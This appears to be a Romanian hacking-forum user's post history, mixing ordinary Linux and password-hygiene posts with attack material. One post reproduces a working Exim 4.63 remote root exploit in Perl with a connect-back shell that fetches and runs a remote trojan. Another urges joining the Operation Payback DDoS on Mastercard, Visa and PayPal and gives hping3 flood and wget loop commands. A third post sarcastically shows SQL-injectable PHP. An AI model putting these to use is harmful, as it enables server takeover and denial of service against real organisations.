-
Posts
2099 -
Joined
-
Last visited
-
Days Won
17
Everything posted by pyth0n3
-
Faptul ca este stabil: Versiunea 4 de Backtrack este de fapt Ubuntu 8.10 deci cat de stabil este ubuntu atît va fi ?i backtrack (pt ca e tot una ) Desi în privin?a bug-urilor cred ca are o gr?mad? , mai multe decît Ubuntu deoarece la multe pachete nu vine f?cut update Ce folos ca are multe tool-uri daca spre exemplu nu vin folosite ? Iar in rest , spre exemplu dac? careva încarc? multe tool-uri intro alta distribu?ie ca Debian, Fedora, Mandriva , etc pot spune intrade-var ca a creat o distribu?ie foarte tare pt pentesting si probabil cu mai pu?ine bug-uri decît backtrack Oricum tine cont ca backtrack vine folosit ca live cd pt pentesting, u?ureaz? munca deoarece are o umplutura de tool-uri ?i atît (de?i eu unul as prefera sa ma joc cu jucariile mele si nu ale altora ) Desi cînd am spus ca u?ureaz? munca ma refeream la to?i cei care au studiat tool-urile din backtrack In rest nu e nimic special decat un produs care aduce bani celor pe care l-au f?cut Vrei sa înve?i sa il folose?ti , ei au cursuri care costa Deci te vor înv??a sa folose?ti tool-urile nu sa devii un expert in pentesting [Avînd în vedere faptul ca oricum vorbim despre sisteme operative mut topicul în Sisteme de Operare]
-
Happy Birthday kw3rln Official Version &&
-
Folosesc password-uri dinamice ?i în account-urile mai pu?in importante doar pt faptul de a ma obi?nui cu acest standard ?tiu ca e greu sa ?ii minte cînd trec 30 sau 60 de zile la fiecare account , de aceea folosesc anumite mijloace care îmi spun ca password-ul respectiv la un account a expirat ?i trebuie schimbat , deci ma satur sa vad un output de tipul "Password Expired" ?i îl regenerez pe alte 60 de zile folosind o medie de 25 de caractere .
-
La cat timp va schimba?i password-ul la un account? Folosi?i acela?i password la mai multe account-uri ? Cate caractere folosi?i pt crearea unui password ? Este important sa iti schimbi password-ul intrun anumit timp?
-
Linux poate fi folosit de c?tre fiecare user [încep?tor, intermediu ,avansat] indiferent de rasa ?i de sex
-
@ionutztentea Ar trebui sa te prezin?i aici
-
Uite de ce nu vin pe acolo In rest sa nu sta?i prea mult intrun singur loc pt ca totul devine normal la un moment dat ?i ai impresia ca e?ti înconjurat de un alt fel de stres Oricum succes ?i sper sa va mearg? exact cum va-?i propus
-
Wrong section There is another place for your request: Section application is only for members with at least 10 posts! Here you can request programs / tutorials Also Search box on the forum , is free , you don't need 10 post to make a search You can also click HERE to introduce yourself
-
Failsafe mode este o op?iune care î?i va ap?rea în meniul de la bootloader , in cazul în care ai probleme cu un normal boot ar trebui sa faci un startup în failsafe mode Te ajuta sa faci un boot cat se poate de sigur în cazul în care ai o eroare sau se întîmpl? ceva intrun runlevel multi-user Presupun ca se poate dezactiva aceasta op?iune din fi?ierul de configurare /boot/grub/menu.lst (de?i nu recomand asa ceva) Fail-safe - Wikipedia, the free encyclopedia
-
Am creat un modul pe care l-am f?cut disponibil în rubrica Bine Ati Venit a forumului ,sec?iunea INTERVIU Vreau doar sa ?tiu ce p?rere ave?i , ce ar trebui ad?ugat , ce ar trebui ?ters ,critici ? Modul Bine Ati Venit (Interviu) Cei care vor sunt ruga?i sa îl completeze , r?spunsurile pot fi publicate direct pe acest forum printr-un link care duce la o statistica a celor care au r?spuns Rezultate modul AICI Summary AICI
-
#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE; system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE; system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system); ---snip--- =cut use IO::Socket; if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; } $|=1; $trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com"; $max_msg = 52428800; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp'); while(<$sock>) { print; if ($_ =~ /220 /) { last;} } print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} } if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; } $vv .= "(" . $helohost . ")"; $from = "root\@local.com"; $to = "postmaster\@localhost"; $msg_len = $max_msg + 1024*256; $logbuffer_size = 8192; $logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n"; $filler = "V" x (8 * 16); $logbuffer_size -= 3; for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; } $hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; } $v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; } $body = substr($body, 0, $msg_len); print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v; print "Sending large buffer, please wait...\n"; print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; while(1){}; Source: FullDisclosure Note: All debian distribution run exim4 by default Debian: 2131-1: exim4: arbitrary code execution
-
truecrypt --password R00tS3c --create /media/data/private Output: Option 'password' requires a value, '=' expected. Error: Incorrect command line specified. truecrypt --password=R00tS3c --create /media/data/private Status OK history 509 truecrypt --password=R00tS3c --create /media/data/private I suggest : history -c Also: truecrypt --interactive Output: Unknown long option 'interactive' Error: Incorrect command line specified Note: It is interactive , there is an option to use non interactive mode --non-interactive Do not interact with user However at last this are the arguments used in the TrueCrypt 7.0a version
-
Fyodor_Dostoyevsky, Alex_Haley, George Orwell , Niccolò Machiavelli, Gabriel García Márquez, John Steinbeck
-
-- As many of you may know, since two days some important websites are under heavy DDoS attack. Among these: - Mastercard - Visa - PayPal - Amazon The reason of this attack is quite clear. The first three payment services stopped all the money transfers to Wikileaks, while Ama- zon unplugged Wikileaks servers. It's something never happened in internet history and an extreme- ly serious threat to the concept of democracy in the world, not only on the net. A private citizen finds his bank accounts blocked without any decision from any court, simply because the U.S. government asked them to do this. And the U.S. government thinks it is above each law in this world. This shit needs to end, as soon as possible. So I invite all of you to stay updated with Anonymous page on Twitter: Twitter Probably the most huge voluntary DDoS attack of the network is starting here. Just join the IRC channel (the servers and chan- nel names change quite often, the censorships is closing once per day the domains of Anonymous, regardless the right to free thought and information, and their Facebook page and their previ- ous Twitter page was removed as well, this is our western democrazy), follow the instruction on the targets to attack, us- ing LOIC application or just manual flood with hping, wget or curl, and have fun. This threat to the web's democracy needs to end, U.S. government is not above each world's law and has no power to choose what to do with citizens' bank accounts or web sites when no evident law violation is there, especially with citizens not living in the U.S. -- Wikileaks needs us -- I guess most of the people around the world know about these days' Wikileaks facts. Well, as you know the web site is massively under DoS and DDoS attacks. Many may wonder what we can do in order to defend the right of being informed against political, legal and diplomatic attacks against it. We can now do something, mirroring Wikileaks on our servers so that a centralized attack against wikileaks.ch or wikileaks.org will just be useless. The steps are quite easy for a system administrator (create a new user on the server, import the required SSH key, and make a new virtual host on Apache). The procedure is better explained here: Bash | #### tutorial about how to set up a wikileaks mirr - Wikileaks mirroring tutorial Once everything is done, you just need to submit your host to the list of Wikileaks mirrors here: http://wikileaks.ch/mass-mir-ror.html -- Some other contact info server: irc.anonops.net Channels: #operationpayback -> the official channel of the movement #tbpitaly -> official channel of the movement in Italian #setup -> setup for information and help for those who wish to join LOICs Some examples using hping by Blacklight for (( i=0; $i < 10; i++ )) do sudo hping3 --flood -S -p 80 www.mastercard.com & done while true; do wget -O /dev/null http://www.mastercard.com/images/mc_splash_view.jpg; done; Source: Wikileak's enemies: show them our strenght Wikileaks needs us Other things: Jester Unveils XerXeS Automated DoS Attack
-
d8, `8P d88 d888b8b ?88 d8P d888b8b ?88 d8P' ?88 d88 d8P' d8P' ?88 88b 88b ,88b ?8b ,88' 88b ,88b `88b `?88P'`88b `?888P' `?88P'`88b )88 ,88P `?888P Install Java 1.6 in Debian (i86) , enable firefox 3.6.x Java Plug-In Step1: Add sid repository in /etc/apt/sources.list ##sid # deb http://ftp.de.debian.org/debian/ sid main # deb-src http://ftp.de.debian.org/debian/ sid main Step2: Update and install Java (as root) apt-get update apt-get install sun-java6-jre sun-java6-bin update-alternatives --auto java java -version (should print the version available) (Note: Now you should disable sid repository as they are not stable , an update or some package install may broke your system ) Ok, also in the repository of Debian you will find sun-java6-plugin , but you may not want to install that cause it will also install the iceweasel (the default browser) If you run firefox the latest version you could just link the /usr/lib/jvm/java-6-sun/jre/lib/i386/libnpjp2.so to /usr/lib/mozilla/plugins (if that is the path where firefox will search for installed plugins) ln -s /usr/lib/jvm/java-6-sun/jre/lib/i386/libnpjp2.so /usr/lib/mozilla/plugins/libjavaplugin.so Open firefox && type about:plug-ins It should print all the plug-ins installed You can also test your java by at this URL http://www.java.com/en/download/help/testvm.xml Download: wget http://sprunge.us/dRiZ -O inst_java_deb.txt
-
DMX what these bitches want && Black Violin Ft. DMX - I'm A Rider && && && && 2Pac feat. Thug Life - "Cradle to the Grave"
-
@fast_michael98 e tare tutorialul , apropo Eu am o asemenea problema îmi explici ?i mie cum sa o rezolv ? Daca nu o rezolv îmi sparg ??tia iar site-ul Ce trebuie sa modific ca sa nu fie vulnerabil la SQLI? mi se face o injec?ie în sql în fiecare zi ?i uite asa se joaca to?i cu datele mele Îmi explici ?i mie cum sa configurez serverul , oare care ar fi mai bun ca server? YourSql , MySql , HideSql ,ThisSql ? Uite eu am scris codul asa , e bun? <?php $sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $POST_['password'] . "'"; response = mysql_query($sql); ?>
-
Bineîn?eles ca probabil au fost implicate ?i alte persoane din intern Bradley Manning - Wikipedia, the free encyclopedia a avut o leg?tura cu wikileaks , dup? pu?in timp încep sa fie publicate diverse documente Presupun ca majoritatea documentelor au fost totu?i intr-o re?ea cu restric?ii la public (ma refer doar la faptul ca accesul putea fi luat doar din anumite puncte ) Deci pt a avea acces ar fi trebuit o alta persoana din intern care la rîndul lui a fost ajutat de c?tre o echipa experta în aceste tipuri de atacuri Bineîn?eles multe alte informa?ii se afla in locuri destul de publice (ma refer la faptul ca pot fi accesate de oricine pe internet ,bineîn?eles prin sfruntarea unor vulnerabilit??i sau în cel mai des caz configurarea foarte proasta a serviciilor din partea administratorilor ) Tinkode a demonstrat de multe ori acest lucru , multi se mira cînd vad asa ceva dar asta este adev?rul în orice domeniu ar fi lucreaz? tot oameni Oricî?i de multi bani vin investi?i în hardware, software nu vor înt?ri niciodat? sl?biciunea creierului uman Internetul vine folosit de c?tre un user normal , dar în acela?i timp ?i server-urile de la majoritatea companiilor se folosesc de aceea?i re?ea Un user normal o data ce a înv??at cum func?ioneaz? anumite lucruri reu?e?te sa descopere diferen?ele sau mai bine zis gre?elile care vin f?cute de c?tre cei care de?in informa?ii importante în servicii prost configurate sau mai bine zis cu o configurare de default Exemplu: (vine instalat un webserver f?r? sa fie modificate diverse fi?iere în care s-ar putea ajunge restric?ii ) In acela?i timp un user care nu cunoa?te aceste lucruri poate folosi diverse programe puse la dispozi?ie pe internet de c?tre al?i useri exper?i în acest domeniu pt a pune în genunchi serverul respectiv Deci nu e de mirat ca anumite informa?ii pot ajunge în mana altora Este o problema foarte mare atunci cînd ajung în mana unora care nu au inten?ii bune Administratorii de re?ea vin pl?ti?i pt ceea ce fac , a?adar nu le r?mîne decît sa isi fac? treaba Confidentiality: Informa?iile trebuie sa fie disponibile doar pt cine este autorizat Integrity: Informa?iile pot fi modificate doar de c?tre cine este autorizat Availability: Informa?iile trebuie sa fie tot timpul disponibile pt cei care sunt autoriza?i Referenta : Information security - Wikipedia, the free encyclopedia
-
Esti sigur ca ai calculat bine fiecare pas?
-
@cosmon se vede ca nu ai folosit un alt sistem de operare decît cel oferit de Microsoft Oricum eu mi-am pierdut deja date de multe ori ?i nu le mai pot descarca (nu am muzica ?i poze în pc ) Un exemplu: Încearc? sa personalizezi un sistem operativ din familia Unix cu toate driver-urile care i?i trebuie ?i cu o gr?mada de scripturi personalizate Dupa care nu fa backup ?i la prima erroare o iei de la cap?t Presupun ca sistemul îl vei personaliza în 2-3 zile dup? care pierzi totul intro secunda ?i lucrezi iar trei zile Daca nici companiile importante nu ar face backup la servere te-as întreba de unde mai descarci programele pe care l-ai pierdut pt ca nu ai facut backup Daca nu il faci tu , zi mul?umesc ca cineva undeva îl face ?i po?i sa ob?ii ceea ce poate din cauza unei errori po?i pierde
-
@HellScream Confirm
-
OK , eu aleg cel mai simplu editor NANO
-
@wingsb respect la fiecare ceea ce este , dac? marya a zis ca e fata nu e problema mea dac? se descoper? a fi un trans
-
In care categorie apar?ine?i , unde vre?i sa fi?i , ce crede?i ca sunte?i? De ce? White Hat Grey Hat Black Hat Script Kiddie or Suicide Hacker Lamer Wannabe Newbie Citi?i înainte sa vota?i fiecare grup a?adar ve?i în?elege unde va încadra?i [EDIT: rog totu?i sa vota?i , nu conteaz? în care categorie va încadra?i , fiecare spune ?i face cea ce crede ca ii place , comenta?i , fiecare cu opinia lui , sa fie ceva liber , critici , totul în mod normal ?i la subiect De ce e?ti ceea ce ce e?ti? Ce te face sa fi asa? ]